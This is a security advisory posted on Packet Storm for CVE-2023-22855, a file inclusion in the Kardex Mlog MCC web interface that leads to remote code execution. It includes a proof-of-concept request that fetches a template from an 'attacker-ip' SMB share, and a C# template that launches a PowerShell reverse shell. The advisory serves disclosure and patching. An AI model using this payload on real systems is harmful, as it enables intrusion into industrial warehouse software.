what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Kardex Mlog MCC 5.7.12+0-a203c2a213-master File Inclusion / Remote Code Execution

Kardex Mlog MCC 5.7.12+0-a203c2a213-master File Inclusion / Remote Code Execution
Posted Feb 17, 2023
Authored by Patrick Hener, Nico Viakowski | Site hesec.de

Kardex Mlog MCC version 5.7.12+0-a203c2a213-master suffers from a file inclusion vulnerability that allows for remote code execution.

tags | exploit, remote, code execution, file inclusion
advisories | CVE-2023-22855
SHA-256 | 960e6d130eb7b30180562e91395b84ea4b20026b7ec3c0ea3b55a62820151341

Kardex Mlog MCC 5.7.12+0-a203c2a213-master File Inclusion / Remote Code Execution

Change Mirror Download
Remote Code Execution in Kardex MLOG
=======================================================================
Product: Kardex Mlog MCC
Vendor: Kardex Holding AG
Tested Version: 5.7.12+0-a203c2a213-master
Fixed Version: inline patch - no new version number
Vulnerability Type: Improper Control of Generation of Code ("RFI") - CWE-94
CVSSv2 Severity: AV:A/AC:L/Au:N/C:C/I:C/A:C - Score 8.3
CVSSv3 Severity: AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H Score 9.6
Solution Status: fixed
Manufacturer Notification: 2022-12-13
Solution Date: 2023-01-24
Public Disclosure: 2023-02-07
CVE Reference: CVE-2023-22855
Authors of Advisory: Patrick Hener & Nico Viakowski

=======================================================================

Vendor description[1]
---------------------

Kardex Mlog’s modular software solution Kardex Control Center manages material
flow and warehouse management processes faster and more efficiently.

From manual block warehouse and interface networking with intelligent partner
systems to an automated intralogistics system connected to production lines and
driverless vehicles, intelligent energy management for the automated stacker
cranes and modern system visualization, the Kardex Control Center modules offer
flexible solutions for your warehouse management.

Vulnerability Details
---------------------

The .NET based software spawns a web interface listening on port 8088.
This interface is meant to control and monitor the material flow.

The user controllable path is handed to a path concatenation function
(`Path.Combine`) without proper sanitization. This yields the possibility to
include local files, as well as remote files (SMB). The path is used in a
function called `getFile`.

The following code snippet shows the vulnerable part of this function:

```cs
public MccHttpServerResult GetFile(string path, string acceptEncoding, string queryString = null)
{
MccHttpServerResult result4;

[... snip ...]

else
{
string getfileName = (path == "/") ? "index.html" : path.Substring(1).Replace("/", Path.DirectorySeparatorChar.ToString(CultureInfo.InvariantCulture));
string fileName = Path.Combine(this.RootDirectory(), getfileName);
string originalFileName = fileName;
```

The .Net function `Path.Combine` also is able to concatenate remote targets. For
example using `\\ipaddress` you can include files from a remote samba server.

Further down the request flow, the application is checking for the MIME type of
the file retrieved.

Depending on the MIME type the content is either sent through a
import/export procedure or rendered as `mono/t4` template. The function
`getMimeType` will return `t4` if the included file is ending with an extension
of `.t4`.

This is where the File Inclusion can be escalated to a Remote Code Execution.
The `mono/t4` templating engine allows the use of `C#` to evaluate code.
This enables an attacker to gain code execution and eventually spawn a reverse
shell.

```cs
bool flag15 = File.Exists(fileName);
if (flag15)
{
using (FileStream f = new FileStream(fileName, FileMode.Open, FileAccess.Read, FileShare.ReadWrite))
{
byte[] bytes = new byte[f.Length];
f.Read(bytes, 0, bytes.Length);
bool flag16 = mime2 == "t4";
if (flag16)
{
return this.runTemplatingEngine(bytes, responseHeaders, queryString);
}
```

Proof of Concept (PoC)
----------------------

The following request will include a remote file from an smb share. For this to
work the attacker has to spawn an smb server (for example using `smbserver.py`
from Impacket[2]).

```
GET /\\attacker-ip/share/exploit.t4 HTTP/1.1
Host: vulnerable.host.internal:8088
Content-Type: text/html
User-Agent: curl/7.86.0
Accept: */*
Connection: close
```

The `exploit.t4` looks like this:

```html
<#@ template language="C#" #>
<#@ Import Namespace="System" #>
<#@ Import Namespace="System.Diagnostics" #>

Proof of Concept - SSTI to RCE
RCE running ...

<#
var proc1 = new ProcessStartInfo();
string anyCommand;
anyCommand = "powershell -e revshell-base64-blob";

proc1.UseShellExecute = true;
proc1.WorkingDirectory = @"C:\Windows\System32";
proc1.FileName = @"C:\Windows\System32\cmd.exe";
proc1.Verb = "runas";
proc1.Arguments = "/c "+anyCommand;
Process.Start(proc1);
#>

Enjoy your shell, good sir :D
```

The exploit above will execute `cmd.exe` and launch a `powershell` to execute
a reverse shell. You can easily generate a reverse shell blob using
revshells.com[3].

A full exploit spawning a reverse shell was created[4].

Solution
--------

The user supplied data should be sanitized before using it in the `Path.Combine`
function.

Disclosure Timeline
-------------------

2022-12-13: Vulnerability discovered
2022-12-13: Vulnerability reported to manufacturer
2023-01-24: Solution provided by manufacturer
2023-02-07: Public disclosure of vulnerability


References
----------

[1] Vendor Website:https://www.kardex.com/en/mlog-control-center
[2] Impacket Git Repository:https://github.com/SecureAuthCorp/impacket
[3] Reverse Shell Generator:https://www.revshells.com/
[4] Exploit on Exploit-DB (tbd):https://www.exploit-db.com/exploits/xxxxx
[5] Blog Post Advisory:https://hesec.de/posts/cve-2023-22855
[6] Personal Github Repo for Advisory:https://github.com/patrickhener/CVE-2023-22855
[7] Blog Post Thinking Objects:https://to.com/blog/advisory-kardex-mlog-CVE-2023-22855

Credits
-------

This security vulnerability was found by Patrick Hener and Nico Viakowski.

E-Mail:patrickhener@posteo.de
E-Mail:n.viakowski@pm.me

Disclaimer
----------

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible.

Copyright
---------

Creative Commons - Attribution (by) - Version 3.0
URL:http://creativecommons.org/licenses/by/3.0/deed.en

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close